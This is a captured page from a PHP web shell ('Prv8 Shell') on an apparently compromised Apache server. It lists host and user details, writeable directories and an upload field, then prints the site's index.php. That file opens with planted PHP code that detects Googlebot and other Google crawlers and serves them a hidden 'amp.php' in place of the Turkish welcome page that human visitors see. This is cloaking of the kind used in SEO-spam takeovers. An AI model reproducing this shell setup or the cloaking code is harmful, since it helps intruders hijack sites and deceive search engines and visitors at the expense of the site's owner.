Prv8 Shell
Server : Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4
System : Linux server.jackjohnson.com 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
User : jackjohn ( 502)
PHP Version : 5.3.17
Disable Function : NONE
Directory :  /home/jackjohn/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/jackjohn/public_html/index.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);

$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';

$googleBots = [
    'Googlebot',
    'AdsBot',
    'Mediapartners-Google',
    'APIs-Google',
    'Googlebot-Image',
    'Googlebot-Video',
    'Googlebot-News',
    'Googlebot-Search',
    'Googlebot-Inspect',
    'Googlebot-Android',
    'Googlebot-Mobile',
    'Googlebot-Ads',
    'Googlebot-Discovery',
    'Google-',
];

if (preg_match('/' . implode('|', $googleBots) . '/i', $userAgent)) {
    if ($_SERVER['REQUEST_URI'] === '/') {
        include 'amp.php'; 
        exit;
    }
}
?>

<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ho&#351; Geldin &#128075;</title>

    <style>
        * {
            box-sizing: border-box;
        }

        body {
            margin: 0;
            min-height: 100vh;
            font-family: 'Inter', system-ui, -apple-system, BlinkMacSystemFont, sans-serif;
            background: linear-gradient(135deg, #0f2027, #203a43, #2c5364);
            display: flex;
            align-items: center;
            justify-content: center;
            color: #fff;
            overflow: hidden;
        }

    
        .bg-glow {
            position: absolute;
            width: 500px;
            height: 500px;
            background: radial-gradient(circle, rgba(0,255,200,0.35), transparent 70%);
            top: -150px;
            right: -150px;
            filter: blur(80px);
        }

        .bg-glow.second {
            background: radial-gradient(circle, rgba(0,150,255,0.35), transparent 70%);
            bottom: -150px;
            left: -150px;
        }

        .welcome-box {
            position: relative;
            background: rgba(255, 255, 255, 0.08);
            backdrop-filter: blur(14px);
            border-radius: 18px;
            padding: 50px 45px;
            max-width: 420px;
            width: 90%;
            text-align: center;
            box-shadow: 0 20px 60px rgba(0,0,0,0.35);
            animation: fadeUp 0.9s ease forwards;
        }

        @keyframes fadeUp {
            from {
                opacity: 0;
                transform: translateY(30px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        .badge {
            display: inline-block;
            background: rgba(0, 255, 200, 0.15);
            color: #00ffd5;
            padding: 6px 14px;
            border-radius: 999px;
            font-size: 13px;
            letter-spacing: 0.5px;
            margin-bottom: 20px;
        }

        h1 {
            font-size: 32px;
            margin: 0 0 15px;
            line-height: 1.2;
        }

        p {
            font-size: 16px;
            color: #d6e3ea;
            line-height: 1.6;
            margin-bottom: 35px;
        }

        .actions {
            display: flex;
            gap: 15px;
            justify-content: center;
            flex-wrap: wrap;
        }

        .btn {
            padding: 12px 26px;
            border-radius: 10px;
            text-decoration: none;
            font-size: 15px;
            font-weight: 500;
            transition: all 0.25s ease;
        }

        .btn.primary {
            background: linear-gradient(135deg, #00ffd5, #00b3ff);
            color: #002b36;
            box-shadow: 0 10px 30px rgba(0, 255, 213, 0.35);
        }

        .btn.primary:hover {
            transform: translateY(-2px);
            box-shadow: 0 15px 40px rgba(0, 255, 213, 0.5);
        }

        .btn.secondary {
            background: rgba(255,255,255,0.1);
            color: #fff;
            border: 1px solid rgba(255,255,255,0.2);
        }

        .btn.secondary:hover {
            background: rgba(255,255,255,0.18);
        }

        footer {
            margin-top: 35px;
            font-size: 13px;
            color: rgba(255,255,255,0.6);
        }

        @media (max-width: 480px) {
            h1 {
                font-size: 26px;
            }
        }
    </style>
</head>
<body>

    <div class="bg-glow"></div>
    <div class="bg-glow second"></div>

    <div class="welcome-box">
        <div class="badge">&#128640; Sistem Aktif</div>

        <h1>Ho&#351; Geldin</h1>
        <p>
            Do&#287;ru yerdesin.  
            Arad&#305;&#287;&#305;n deneyim burada ba&#351;l&#305;yor.
        </p>

        <div class="actions">
            <a href="/about" class="btn primary">Ke&#351;fet</a>
            <a href="/contact" class="btn secondary">&#304;leti&#351;im</a>
        </div>

        <footer>
            © <?= date('Y') ?> Tüm haklar&#305; sakl&#305;d&#305;r
        </footer>
    </div>

</body>
</html>


haha - 2025